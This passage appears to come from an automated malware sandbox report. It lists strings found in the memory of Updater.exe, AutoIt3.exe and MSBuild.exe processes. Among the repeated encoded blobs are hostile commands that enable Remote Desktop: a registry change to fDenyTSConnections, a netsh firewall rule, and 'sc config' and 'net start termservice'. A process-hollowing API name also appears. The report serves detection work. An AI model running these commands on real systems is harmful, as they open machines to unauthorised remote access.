bC=aRC=NR3z4z0r8G5KhXFaTatj80pSeUrj4nJmWb3D2L6hS1V8RyF8gVNkTKxqiQQvCSTkIHUyBL5qAFjI2V XT09QOUVehVtl76dSeTZwFiud9SDyBPWe8KIXLG97gOMZCqJ hDukFyud8Lrq2fKqTX49F6UPGVdr8KZkgC5JjPtbImt gEru2WG9avfA2bdsS7VbgC5oizBbS0SFGdQMAFiyBL5qFW4=IHUSs 
==MSHo3c5uIbjBPp==NR3z4z0r8G5KhXFaTat87LtkeTDj5Gem9839BQi08C5ce3NiQPNo6KNm2ZZmQWJ=RQfYLx0KRIRRfnNagfJt66XSgjZuL2ORUtHA2gWv66B3T2cihzNQT1BG2TRnOEGm9Mv64z0vNqJj2Q==NR3y3A0XT1NE1W5aVLDoPz0jT6lfdmxhgOXl7Lxqg0H35n7VbMiBCMNwHHYSQzkUQN0=IMPz1PSsTKYjRQfYLx0KRIRRfnNagfJt66XSgjZuL2ORUtHA2gWv66B3YW9eiyNaPqdc3TZeH02FSuDUJyCTMYVvW1A=RQfYLx0KRIRlenVngUpJT1IoQAveL2OpabfoPQS KqJpdWRtfPFm6KxX1CPrQGOmSbfpPPdGLE==UsuBCwF=OvPrOQ0p8JRbgHVege6pFp K3UDx3HOR8L3zOvPrOQ0p8JRbgHVege6pFpdK3UDx3HOR8L3zRP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSGlJeW K7ZofmZjixRb7rFhfZU=RwDAPA0g8I98eWY=J9uCEJ==J9uDC ==J9uCD ==J9uDDJ==NSPD3f0r8INRdWB Up==L9ia cPzPzCpGDMk2XlaIRmlFcLm3Vyo50BiLCcbNu1f6WsaF8urzbGX505be3ZPNvw7DmQ93DLuzA==G8SlHQmm8GM=F8urzbGvT087FrSryt==Rv38PQOw5KZieC9ajyM=ILP9PPSY8KplenFkgyd 9Wtq3TRx5GOq8L8zPPVdFY3feGY6N9==F6== Rb64zWs8687OXQ6QPI7GE== SKd3p== bzzPzdqABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Keyboard Layout\Preload0000041900000422000004230000043fSystemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice start= aut
Source: Updater.exe, 00000023.00000003.2237303826.00000000047EC000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: net start termservice
Source: Updater.exe, 00000023.00000003.2237303826.00000000047EC000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: Unknown exceptionbad array new length: genericiostreamiostream stream errorFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set805f14f85ee1dae0f3315e33e81c2a42cb36de7f397799e419deb9caf3a96a89322a8d6d5a45058fa30d5968f8d3f9443ad8a7JIODBcl2FnIVRC8mRbI=IobnPxWw8nRadzNvWa1f6qJdizVy2Ht=KHYBCp==RnUq2AZqGHVx4J==IHPx4J==WI8qCcJ2SngmQg==OSb54Q0qFqZU2Q==RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5YkLwK2YaWF==RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5VU8y3G2pWMDhLQSi7mFJdGZhgutw66pc3UzBRSLm3gWY7E==RbPyVRVpyvdACJNDUEpHNu1pF7w9RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5YkLw cPzPzCpGDM7RwDAPWOe61Q=RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5VU8y3G2pWMDhKVmi6KA7Umch4yNo7A==GKPYHOONOocwVUBuOI==UtzB3t==Rt3YLt==OPPZ8LKaacGa RKa9SGaVbeaVMCa vGaaLYaWvUaVMSa9wSa9R7a 9U=VSDqPv h6KBY12BehuXa6Kp0VSDqPv h6KA=VRru3v h6KA=Wsy=WIy=WIC=WIG=QLzu2 ==8wL53wtsFA==8wL53AR3FCb=WMbqWvrxVRVp wGC9MHubbfBISz61P0XMvG+MvK+IQvx4Pim6rQlHnmwFl==cp==GcPz1QV6MF== Rbq2zBwGm9aeGA=8RPD2f0pGDMk2GBhORP5JfKX513bX3poiyNjM0Xeft==RwDAPWOe6YV8gGJ2NKTGKUVdO6ccgHh7heM=NMTu3fJ=PRzE3z0v76xVLEB739==OKHKLt==RvzzPzJdO6Z gXNeizc=Ov3o4zdvCJhb1g==NKTMJoSBLzdXS0BJ2WRQhedQ9U==Nbf5Pz0jT09a2XM=Qb3D4zdrRR3B1zdwNR3y2VWsSRfzHz0jT09a2XM=JsyDCsVYHngURQ== bC=aRC=NR3z4z0r8G5KhXFaTatj80pSeUrj4nJmWb3D2L6hS1V8RyF8gVNkTKxqiQQvCSTkIHUyBL5qAFjI2V XT09QOUVehVtl76dSeTZwFiud9SDyBPWe8KIXLG97gOMZCqJ hDukFyud8Lrq2fKqTX49F6UPGVdr8KZkgC5JjPtbImt gEru2WG9avfA2bdsS7VbgC5oizBbS0SFGdQMAFiyBL5qFW4=IHUSs 
==MSHo3c5uIbjBPp==NR3z4z0r8G5KhXFaTat87LtkeTDj5Gem9839BQi08C5ce3NiQPNo6KNm2ZZmQWJ=RQfYLx0KRIRRfnNagfJt66XSgjZuL2ORUtHA2gWv66B3T2cihzNQT1BG2TRnOEGm9Mv64z0vNqJj2Q==NR3y3A0XT1NE1W5aVLDoPz0jT6lfdmxhgOXl7Lxqg0H35n7VbMiBCMNwHHYSQzkUQN0=IMPz1PSsTKYjRQfYLx0KRIRRfnNagfJt66XSgjZuL2ORUtHA2gWv66B3YW9eiyNaPqdc3TZeH02FSuDUJyCTMYVvW1A=RQfYLx0KRIRlenVngUpJT1IoQAveL2OpabfoPQS KqJpdWRtfPFm6KxX1CPrQGOmSbfpPPdGLE==UsuBCwF=OvPrOQ0p8JRbgHVege6pFp K3UDx3HOR8L3zOvPrOQ0p8JRbgHVege6pFpdK3UDx3HOR8L3zRP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSGlJeW K7ZofmZjixRb7rFhfZU=RwDAPA0g8I98eWY=J9uCEJ==J9uDC ==J9uCD ==J9uDDJ==NSPD3f0r8INRdWB Up==L9ia cPzPzCpGDMk2XlaIRmlFcLm3Vyo50BiLCcbNu1f6WsaF8urzbGX505be3ZPNvw7DmQ93DLuzA==G8SlHQmm8GM=F8urzbGvT087FrSryt==Rv38PQOw5KZieC9ajyM=ILP9PPSY8KplenFkgyd 9Wtq3TRx5GOq8L8zPPVdFY3feGY6N9==F6== Rb64zWs8687OXQ6QPI7GE== SKd3p== bzzPzdqABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Keyboard Layout\Preload0000041900000422000004230000043fSystemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice start= aut
Source: AutoIt3.exe, 00000026.00000003.2408266551.0000000004A3C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: net start termservice
Source: AutoIt3.exe, 00000026.00000003.2408266551.0000000004A3C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: Unknown exceptionbad array new length: genericiostreamiostream stream errorFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set805f14f85ee1dae0f3315e33e81c2a42cb36de7f397799e419deb9caf3a96a89322a8d6d5a45058fa30d5968f8d3f9443ad8a7JIODBcl2FnIVRC8mRbI=IobnPxWw8nRadzNvWa1f6qJdizVy2Ht=KHYBCp==RnUq2AZqGHVx4J==IHPx4J==WI8qCcJ2SngmQg==OSb54Q0qFqZU2Q==RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5YkLwK2YaWF==RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5VU8y3G2pWMDhLQSi7mFJdGZhgutw66pc3UzBRSLm3gWY7E==RbPyVRVpyvdACJNDUEpHNu1pF7w9RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5YkLw cPzPzCpGDM7RwDAPWOe61Q=RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5VU8y3G2pWMDhKVmi6KA7Umch4yNo7A==GKPYHOONOocwVUBuOI==UtzB3t==Rt3YLt==OPPZ8LKaacGa RKa9SGaVbeaVMCa vGaaLYaWvUaVMSa9wSa9R7a 9U=VSDqPv h6KBY12BehuXa6Kp0VSDqPv h6KA=VRru3v h6KA=Wsy=WIy=WIC=WIG=QLzu2 ==8wL53wtsFA==8wL53AR3FCb=WMbqWvrxVRVp wGC9MHubbfBISz61P0XMvG+MvK+IQvx4Pim6rQlHnmwFl==cp==GcPz1QV6MF== Rbq2zBwGm9aeGA=8RPD2f0pGDMk2GBhORP5JfKX513bX3poiyNjM0Xeft==RwDAPWOe6YV8gGJ2NKTGKUVdO6ccgHh7heM=NMTu3fJ=PRzE3z0v76xVLEB739==OKHKLt==RvzzPzJdO6Z gXNeizc=Ov3o4zdvCJhb1g==NKTMJoSBLzdXS0BJ2WRQhedQ9U==Nbf5Pz0jT09a2XM=Qb3D4zdrRR3B1zdwNR3y2VWsSRfzHz0jT09a2XM=JsyDCsVYHngURQ== bC=aRC=NR3z4z0r8G5KhXFaTatj80pSeUrj4nJmWb3D2L6hS1V8RyF8gVNkTKxqiQQvCSTkIHUyBL5qAFjI2V XT09QOUVehVtl76dSeTZwFiud9SDyBPWe8KIXLG97gOMZCqJ hDukFyud8Lrq2fKqTX49F6UPGVdr8KZkgC5JjPtbImt gEru2WG9avfA2bdsS7VbgC5oizBbS0SFGdQMAFiyBL5qFW4=IHUSs 
==MSHo3c5uIbjBPp==NR3z4z0r8G5KhXFaTat87LtkeTDj5Gem9839BQi08C5ce3NiQPNo6KNm2ZZmQWJ=RQfYLx0KRIRRfnNagfJt66XSgjZuL2ORUtHA2gWv66B3T2cihzNQT1BG2TRnOEGm9Mv64z0vNqJj2Q==NR3y3A0XT1NE1W5aVLDoPz0jT6lfdmxhgOXl7Lxqg0H35n7VbMiBCMNwHHYSQzkUQN0=IMPz1PSsTKYjRQfYLx0KRIRRfnNagfJt66XSgjZuL2ORUtHA2gWv66B3YW9eiyNaPqdc3TZeH02FSuDUJyCTMYVvW1A=RQfYLx0KRIRlenVngUpJT1IoQAveL2OpabfoPQS KqJpdWRtfPFm6KxX1CPrQGOmSbfpPPdGLE==UsuBCwF=OvPrOQ0p8JRbgHVege6pFp K3UDx3HOR8L3zOvPrOQ0p8JRbgHVege6pFpdK3UDx3HOR8L3zRP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSGlJeW K7ZofmZjixRb7rFhfZU=RwDAPA0g8I98eWY=J9uCEJ==J9uDC ==J9uCD ==J9uDDJ==NSPD3f0r8INRdWB Up==L9ia cPzPzCpGDMk2XlaIRmlFcLm3Vyo50BiLCcbNu1f6WsaF8urzbGX505be3ZPNvw7DmQ93DLuzA==G8SlHQmm8GM=F8urzbGvT087FrSryt==Rv38PQOw5KZieC9ajyM=ILP9PPSY8KplenFkgyd 9Wtq3TRx5GOq8L8zPPVdFY3feGY6N9==F6== Rb64zWs8687OXQ6QPI7GE== SKd3p== bzzPzdqABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Keyboard Layout\Preload0000041900000422000004230000043fSystemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice start= aut
Source: AutoIt3.exe, 00000026.00000003.2408112931.0000000004C30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: net start termservice
Source: AutoIt3.exe, 00000026.00000003.2408112931.0000000004C30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: Unknown exceptionbad array new length: genericiostreamiostream stream errorFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set805f14f85ee1dae0f3315e33e81c2a42cb36de7f397799e419deb9caf3a96a89322a8d6d5a45058fa30d5968f8d3f9443ad8a7JIODBcl2FnIVRC8mRbI=IobnPxWw8nRadzNvWa1f6qJdizVy2Ht=KHYBCp==RnUq2AZqGHVx4J==IHPx4J==WI8qCcJ2SngmQg==OSb54Q0qFqZU2Q==RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5YkLwK2YaWF==RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5VU8y3G2pWMDhLQSi7mFJdGZhgutw66pc3UzBRSLm3gWY7E==RbPyVRVpyvdACJNDUEpHNu1pF7w9RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5YkLw cPzPzCpGDM7RwDAPWOe61Q=RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5VU8y3G2pWMDhKVmi6KA7Umch4yNo7A==GKPYHOONOocwVUBuOI==UtzB3t==Rt3YLt==OPPZ8LKaacGa RKa9SGaVbeaVMCa vGaaLYaWvUaVMSa9wSa9R7a 9U=VSDqPv h6KBY12BehuXa6Kp0VSDqPv h6KA=VRru3v h6KA=Wsy=WIy=WIC=WIG=QLzu2 ==8wL53wtsFA==8wL53AR3FCb=WMbqWvrxVRVp wGC9MHubbfBISz61P0XMvG+MvK+IQvx4Pim6rQlHnmwFl==cp==GcPz1QV6MF== Rbq2zBwGm9aeGA=8RPD2f0pGDMk2GBhORP5JfKX513bX3poiyNjM0Xeft==RwDAPWOe6YV8gGJ2NKTGKUVdO6ccgHh7heM=NMTu3fJ=PRzE3z0v76xVLEB739==OKHKLt==RvzzPzJdO6Z gXNeizc=Ov3o4zdvCJhb1g==NKTMJoSBLzdXS0BJ2WRQhedQ9U==Nbf5Pz0jT09a2XM=Qb3D4zdrRR3B1zdwNR3y2VWsSRfzHz0jT09a2XM=JsyDCsVYHngURQ== bC=aRC=NR3z4z0r8G5KhXFaTatj80pSeUrj4nJmWb3D2L6hS1V8RyF8gVNkTKxqiQQvCSTkIHUyBL5qAFjI2V XT09QOUVehVtl76dSeTZwFiud9SDyBPWe8KIXLG97gOMZCqJ hDukFyud8Lrq2fKqTX49F6UPGVdr8KZkgC5JjPtbImt gEru2WG9avfA2bdsS7VbgC5oizBbS0SFGdQMAFiyBL5qFW4=IHUSs 
==MSHo3c5uIbjBPp==NR3z4z0r8G5KhXFaTat87LtkeTDj5Gem9839BQi08C5ce3NiQPNo6KNm2ZZmQWJ=RQfYLx0KRIRRfnNagfJt66XSgjZuL2ORUtHA2gWv66B3T2cihzNQT1BG2TRnOEGm9Mv64z0vNqJj2Q==NR3y3A0XT1NE1W5aVLDoPz0jT6lfdmxhgOXl7Lxqg0H35n7VbMiBCMNwHHYSQzkUQN0=IMPz1PSsTKYjRQfYLx0KRIRRfnNagfJt66XSgjZuL2ORUtHA2gWv66B3YW9eiyNaPqdc3TZeH02FSuDUJyCTMYVvW1A=RQfYLx0KRIRlenVngUpJT1IoQAveL2OpabfoPQS KqJpdWRtfPFm6KxX1CPrQGOmSbfpPPdGLE==UsuBCwF=OvPrOQ0p8JRbgHVege6pFp K3UDx3HOR8L3zOvPrOQ0p8JRbgHVege6pFpdK3UDx3HOR8L3zRP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSGlJeW K7ZofmZjixRb7rFhfZU=RwDAPA0g8I98eWY=J9uCEJ==J9uDC ==J9uCD ==J9uDDJ==NSPD3f0r8INRdWB Up==L9ia cPzPzCpGDMk2XlaIRmlFcLm3Vyo50BiLCcbNu1f6WsaF8urzbGX505be3ZPNvw7DmQ93DLuzA==G8SlHQmm8GM=F8urzbGvT087FrSryt==Rv38PQOw5KZieC9ajyM=ILP9PPSY8KplenFkgyd 9Wtq3TRx5GOq8L8zPPVdFY3feGY6N9==F6== Rb64zWs8687OXQ6QPI7GE== SKd3p== bzzPzdqABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Keyboard Layout\Preload0000041900000422000004230000043fSystemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice start= aut
Source: AutoIt3.exe, 00000026.00000002.2411185727.0000000004550000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: net start termservice
Source: AutoIt3.exe, 00000026.00000002.2411185727.0000000004550000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: Unknown exceptionbad array new length: genericiostreamiostream stream errorFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set805f14f85ee1dae0f3315e33e81c2a42cb36de7f397799e419deb9caf3a96a89322a8d6d5a45058fa30d5968f8d3f9443ad8a7JIODBcl2FnIVRC8mRbI=IobnPxWw8nRadzNvWa1f6qJdizVy2Ht=KHYBCp==RnUq2AZqGHVx4J==IHPx4J==WI8qCcJ2SngmQg==OSb54Q0qFqZU2Q==RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5YkLwK2YaWF==RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5VU8y3G2pWMDhLQSi7mFJdGZhgutw66pc3UzBRSLm3gWY7E==RbPyVRVpyvdACJNDUEpHNu1pF7w9RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5YkLw cPzPzCpGDM7RwDAPWOe61Q=RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5VU8y3G2pWMDhKVmi6KA7Umch4yNo7A==GKPYHOONOocwVUBuOI==UtzB3t==Rt3YLt==OPPZ8LKaacGa RKa9SGaVbeaVMCa vGaaLYaWvUaVMSa9wSa9R7a 9U=VSDqPv h6KBY12BehuXa6Kp0VSDqPv h6KA=VRru3v h6KA=Wsy=WIy=WIC=WIG=QLzu2 ==8wL53wtsFA==8wL53AR3FCb=WMbqWvrxVRVp wGC9MHubbfBISz61P0XMvG+MvK+IQvx4Pim6rQlHnmwFl==cp==GcPz1QV6MF== Rbq2zBwGm9aeGA=8RPD2f0pGDMk2GBhORP5JfKX513bX3poiyNjM0Xeft==RwDAPWOe6YV8gGJ2NKTGKUVdO6ccgHh7heM=NMTu3fJ=PRzE3z0v76xVLEB739==OKHKLt==RvzzPzJdO6Z gXNeizc=Ov3o4zdvCJhb1g==NKTMJoSBLzdXS0BJ2WRQhedQ9U==Nbf5Pz0jT09a2XM=Qb3D4zdrRR3B1zdwNR3y2VWsSRfzHz0jT09a2XM=JsyDCsVYHngURQ== bC=aRC=NR3z4z0r8G5KhXFaTatj80pSeUrj4nJmWb3D2L6hS1V8RyF8gVNkTKxqiQQvCSTkIHUyBL5qAFjI2V XT09QOUVehVtl76dSeTZwFiud9SDyBPWe8KIXLG97gOMZCqJ hDukFyud8Lrq2fKqTX49F6UPGVdr8KZkgC5JjPtbImt gEru2WG9avfA2bdsS7VbgC5oizBbS0SFGdQMAFiyBL5qFW4=IHUSs 
==MSHo3c5uIbjBPp==NR3z4z0r8G5KhXFaTat87LtkeTDj5Gem9839BQi08C5ce3NiQPNo6KNm2ZZmQWJ=RQfYLx0KRIRRfnNagfJt66XSgjZuL2ORUtHA2gWv66B3T2cihzNQT1BG2TRnOEGm9Mv64z0vNqJj2Q==NR3y3A0XT1NE1W5aVLDoPz0jT6lfdmxhgOXl7Lxqg0H35n7VbMiBCMNwHHYSQzkUQN0=IMPz1PSsTKYjRQfYLx0KRIRRfnNagfJt66XSgjZuL2ORUtHA2gWv66B3YW9eiyNaPqdc3TZeH02FSuDUJyCTMYVvW1A=RQfYLx0KRIRlenVngUpJT1IoQAveL2OpabfoPQS KqJpdWRtfPFm6KxX1CPrQGOmSbfpPPdGLE==UsuBCwF=OvPrOQ0p8JRbgHVege6pFp K3UDx3HOR8L3zOvPrOQ0p8JRbgHVege6pFpdK3UDx3HOR8L3zRP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSGlJeW K7ZofmZjixRb7rFhfZU=RwDAPA0g8I98eWY=J9uCEJ==J9uDC ==J9uCD ==J9uDDJ==NSPD3f0r8INRdWB Up==L9ia cPzPzCpGDMk2XlaIRmlFcLm3Vyo50BiLCcbNu1f6WsaF8urzbGX505be3ZPNvw7DmQ93DLuzA==G8SlHQmm8GM=F8urzbGvT087FrSryt==Rv38PQOw5KZieC9ajyM=ILP9PPSY8KplenFkgyd 9Wtq3TRx5GOq8L8zPPVdFY3feGY6N9==F6== Rb64zWs8687OXQ6QPI7GE== SKd3p== bzzPzdqABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Keyboard Layout\Preload0000041900000422000004230000043fSystemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice start= aut
Source: MSBuild.exe String found in binary or memory: net start termservice
Source: MSBuild.exe, 00000029.00000002.2409431093.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: net start termservice
Source: MSBuild.exe, 00000029.00000002.2409431093.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: Unknown exceptionbad array new length: genericiostreamiostream stream errorFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set805f14f85ee1dae0f3315e33e81c2a42cb36de7f397799e419deb9caf3a96a89322a8d6d5a45058fa30d5968f8d3f9443ad8a7JIODBcl2FnIVRC8mRbI=IobnPxWw8nRadzNvWa1f6qJdizVy2Ht=KHYBCp==RnUq2AZqGHVx4J==IHPx4J==WI8qCcJ2SngmQg==OSb54Q0qFqZU2Q==RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5YkLwK2YaWF==RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5VU8y3G2pWMDhLQSi7mFJdGZhgutw66pc3UzBRSLm3gWY7E==RbPyVRVpyvdACJNDUEpHNu1pF7w9RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5YkLw cPzPzCpGDM7RwDAPWOe61Q=RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5VU8y3G2pWMDhKVmi6KA7Umch4yNo7A==GKPYHOONOocwVUBuOI==UtzB3t==Rt3YLt==OPPZ8LKaacGa RKa9SGaVbeaVMCa vGaaLYaWvUaVMSa9wSa9R7a 9U=VSDqPv h6KBY12BehuXa6Kp0VSDqPv h6KA=VRru3v h6KA=Wsy=WIy=WIC=WIG=QLzu2 ==8wL53wtsFA==8wL53AR3FCb=WMbqWvrxVRVp wGC9MHubbfBISz61P0XMvG+MvK+IQvx4Pim6rQlHnmwFl==cp==GcPz1QV6MF== Rbq2zBwGm9aeGA=8RPD2f0pGDMk2GBhORP5JfKX513bX3poiyNjM0Xeft==RwDAPWOe6YV8gGJ2NKTGKUVdO6ccgHh7heM=NMTu3fJ=PRzE3z0v76xVLEB739==OKHKLt==RvzzPzJdO6Z gXNeizc=Ov3o4zdvCJhb1g==NKTMJoSBLzdXS0BJ2WRQhedQ9U==Nbf5Pz0jT09a2XM=Qb3D4zdrRR3B1zdwNR3y2VWsSRfzHz0jT09a2XM=JsyDCsVYHngURQ== bC=aRC=NR3z4z0r8G5KhXFaTatj80pSeUrj4nJmWb3D2L6hS1V8RyF8gVNkTKxqiQQvCSTkIHUyBL5qAFjI2V XT09QOUVehVtl76dSeTZwFiud9SDyBPWe8KIXLG97gOMZCqJ hDukFyud8Lrq2fKqTX49F6UPGVdr8KZkgC5JjPtbImt gEru2WG9avfA2bdsS7VbgC5oizBbS0SFGdQMAFiyBL5qFW4=IHUSs 
==MSHo3c5uIbjBPp==NR3z4z0r8G5KhXFaTat87LtkeTDj5Gem9839BQi08C5ce3NiQPNo6KNm2ZZmQWJ=RQfYLx0KRIRRfnNagfJt66XSgjZuL2ORUtHA2gWv66B3T2cihzNQT1BG2TRnOEGm9Mv64z0vNqJj2Q==NR3y3A0XT1NE1W5aVLDoPz0jT6lfdmxhgOXl7Lxqg0H35n7VbMiBCMNwHHYSQzkUQN0=IMPz1PSsTKYjRQfYLx0KRIRRfnNagfJt66XSgjZuL2ORUtHA2gWv66B3YW9eiyNaPqdc3TZeH02FSuDUJyCTMYVvW1A=RQfYLx0KRIRlenVngUpJT1IoQAveL2OpabfoPQS KqJpdWRtfPFm6KxX1CPrQGOmSbfpPPdGLE==UsuBCwF=OvPrOQ0p8JRbgHVege6pFp K3UDx3HOR8L3zOvPrOQ0p8JRbgHVege6pFpdK3UDx3HOR8L3zRP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSGlJeW K7ZofmZjixRb7rFhfZU=RwDAPA0g8I98eWY=J9uCEJ==J9uDC ==J9uCD ==J9uDDJ==NSPD3f0r8INRdWB Up==L9ia cPzPzCpGDMk2XlaIRmlFcLm3Vyo50BiLCcbNu1f6WsaF8urzbGX505be3ZPNvw7DmQ93DLuzA==G8SlHQmm8GM=F8urzbGvT087FrSryt==Rv38PQOw5KZieC9ajyM=ILP9PPSY8KplenFkgyd 9Wtq3TRx5GOq8L8zPPVdFY3feGY6N9==F6== Rb64zWs8687OXQ6QPI7GE== SKd3p== bzzPzdqABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Keyboard Layout\Preload0000041900000422000004230000043fSystemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice start= aut
Source: AutoIt3.exe, 0000002A.00000003.2497527821.0000000004AD0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: net start termservice
Source: AutoIt3.exe, 0000002A.00000003.2497527821.0000000004AD0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: Unknown exceptionbad array new length: genericiostreamiostream stream errorFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set805f14f85ee1dae0f3315e33e81c2a42cb36de7f397799e419deb9caf3a96a89322a8d6d5a45058fa30d5968f8d3f9443ad8a7JIODBcl2FnIVRC8mRbI=IobnPxWw8nRadzNvWa1f6qJdizVy2Ht=KHYBCp==RnUq2AZqGHVx4J==IHPx4J==WI8qCcJ2SngmQg==OSb54Q0qFqZU2Q==RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5YkLwK2YaWF==RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5VU8y3G2pWMDhLQSi7mFJdGZhgutw66pc3UzBRSLm3gWY7E==RbPyVRVpyvdACJNDUEpHNu1pF7w9RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5YkLw cPzPzCpGDM7RwDAPWOe61Q=RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5VU8y3G2pWMDhKVmi6KA7Umch4yNo7A==GKPYHOONOocwVUBuOI==UtzB3t==Rt3YLt==OPPZ8LKaacGa RKa9SGaVbeaVMCa vGaaLYaWvUaVMSa9wSa9R7a 9U=VSDqPv h6KBY12BehuXa6Kp0VSDqPv 